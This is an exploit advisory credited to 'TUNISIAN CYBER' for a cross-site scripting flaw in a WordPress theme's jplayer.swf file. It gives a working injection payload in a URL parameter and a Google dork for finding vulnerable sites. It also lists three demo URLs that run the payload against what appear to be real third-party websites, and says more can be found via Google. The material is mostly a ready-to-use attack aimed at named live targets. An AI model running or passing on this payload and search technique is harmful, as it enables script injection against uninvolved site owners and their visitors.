facebook facebook twitter rss

WordPress hipster (jplayer.swf) Cross Site Scripting vulnerability

Author: TUNISIAN CYBER , Published: 04-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: WordPress hipster (jplayer.swf) Cross Site Scripting vulnerability
[+] Date: 4-12-2013
[+] Category: WebApp
[+] Google Dork: inurl:"/wp-content/themes/moustachey"
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################

Proof:

http: //127.0.0.1/[Path]/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//


Demos:
http://www.oletimey.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://brisbanefringe.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://www.joeposa.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//

the rest @ google

./3nD
########################################################################################

Like us on Facebook :